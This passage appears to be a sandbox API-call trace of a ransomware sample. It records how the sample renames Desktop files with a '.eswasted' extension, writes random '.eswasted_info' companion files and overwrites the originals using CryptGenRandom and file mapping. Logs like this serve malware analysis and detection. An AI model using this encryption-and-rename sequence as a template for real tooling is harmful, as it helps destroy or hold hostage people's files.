"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ct8awpwimcasr.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.920] WriteFile (in: hFile=0x11c, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.922] SetEndOfFile (hFile=0x11c) returned 1 [0072.922] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.922] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ct8awPWiMCAsR.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ct8awpwimcasr.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ct8awPWiMCAsR.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ct8awpwimcasr.gif.eswasted")) returned 1 [0072.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ct8awPWiMCAsR.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ct8awpwimcasr.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0072.923] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0072.925] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.926] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.926] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.926] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.927] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.927] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.953] SetEndOfFile (hFile=0x11c) returned 1 [0072.956] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.956] CloseHandle (hObject=0x11c) returned 1 [0072.963] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0072.963] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.964] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.964] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.964] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FUalO.gif") returned 51 [0072.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x270) returned 0x717b00 [0072.964] lstrcpyW (in: lpString1=0x717b66, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.964] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.965] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.965] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FUalO.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fualo.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.967] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.968] SetEndOfFile (hFile=0x11c) returned 1 [0072.969] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.969] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.969] lstrcpyW (in: lpString1=0x717b66, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.969] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FUalO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fualo.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FUalO.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fualo.gif.eswasted")) returned 1 [0072.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FUalO.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fualo.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0072.971] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0072.973] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.974] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.974] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.974] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.975] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.975] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.044] SetEndOfFile (hFile=0x11c) [0073.044] SetEndOfFile (hFile=0x11c) returned 1 [0073.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0073.048] CloseHandle (hObject=0x11c) returned 1 [0073.050] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.050] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.051] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.051] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kzr4mcyEP4AwaACGLrE0.mkv") returned 66 [0073.051] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28e) returned 0x6f5cc0 [0073.051] lstrcpyW (in: lpString1=0x6f5d44, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.051] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.051] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.052] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.052] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kzr4mcyEP4AwaACGLrE0.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kzr4mcyep4awaacglre0.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.173] WriteFile (in: hFile=0x108, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.175] SetEndOfFile (hFile=0x108) returned 1 [0073.175] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.175] lstrcpyW (in: lpString1=0x6f5d44, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kzr4mcyEP4AwaACGLrE0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kzr4mcyep4awaacglre0.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kzr4mcyEP4AwaACGLrE0.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kzr4mcyep4awaacglre0.mkv.eswasted")) returned 1 [0073.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kzr4mcyEP4AwaACGLrE0.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kzr4mcyep4awaacglre0.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.177] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.179] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.180] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.180] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.180] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.181] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.181] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.192] SetEndOfFile (hFile=0x108) returned 1 [0073.195] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.195] CloseHandle (hObject=0x108) returned 1 [0073.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.197] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.198] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.198] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.198] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MP6HXq28dNC-6.gif") returned 59 [0073.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x6f5cc0 [0073.198] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.198] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.199] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.199] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MP6HXq28dNC-6.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mp6hxq28dnc-6.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.216] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.217] SetEndOfFile (hFile=0x11c) returned 1 [0073.217] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.217] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MP6HXq28dNC-6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mp6hxq28dnc-6.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MP6HXq28dNC-6.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mp6hxq28dnc-6.gif.eswasted")) returned 1 [0073.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MP6HXq28dNC-6.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mp6hxq28dnc-6.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.219] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0073.222] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.223] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0073.223] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.223] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.224] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.224] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.232] SetEndOfFile (hFile=0x11c) returned 1 [0073.235] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.235] CloseHandle (hObject=0x11c) returned 1 [0073.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.239] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.240] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.241] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oboVmdF0DY0D7mvC.m4a") returned 62 [0073.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x286) returned 0x6f5cc0 [0073.241] lstrcpyW (in: lpString1=0x6f5d3c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.241] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.242] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.242] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oboVmdF0DY0D7mvC.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\obovmdf0dy0d7mvc.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.255] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.256] SetEndOfFile (hFile=0x11c) returned 1 [0073.256] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.256] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.256] lstrcpyW (in: lpString1=0x6f5d3c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oboVmdF0DY0D7mvC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\obovmdf0dy0d7mvc.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oboVmdF0DY0D7mvC.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\obovmdf0dy0d7mvc.m4a.eswasted")) returned 1 [0073.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oboVmdF0DY0D7mvC.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\obovmdf0dy0d7mvc.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.257] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.258] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.258] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.259] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.259] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.259] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.259] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.269] SetEndOfFile (hFile=0x11c) returned 1 [0073.271] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.271] CloseHandle (hObject=0x11c) returned 1 [0073.273] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.273] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.274] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.274] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.274] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PLWx5yD-v08SkcN.csv") returned 61 [0073.274] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x284) returned 0x6f5cc0 [0073.274] lstrcpyW (in: lpString1=0x6f5d3a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.274] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.275] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.275] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.276] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PLWx5yD-v08SkcN.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plwx5yd-v08skcn.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.279] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.280] SetEndOfFile (hFile=0x11c) returned 1 [0073.280] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.280] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.280] lstrcpyW (in: lpString1=0x6f5d3a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PLWx5yD-v08SkcN.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plwx5yd-v08skcn.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PLWx5yD-v08SkcN.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plwx5yd-v08skcn.csv.eswasted")) returned 1 [0073.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PLWx5yD-v08SkcN.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plwx5yd-v08skcn.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.281] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0073.283] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.284] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.284] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.284] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.285] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.285] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.296] SetEndOfFile (hFile=0x11c) returned 1 [0073.298] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.298] CloseHandle (hObject=0x11c) returned 1 [0073.300] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.301] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.302] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.302] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q n0IQ.bmp") returned 52 [0073.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x6f5cc0 [0073.302] lstrcpyW (in: lpString1=0x6f5d28, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.302] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 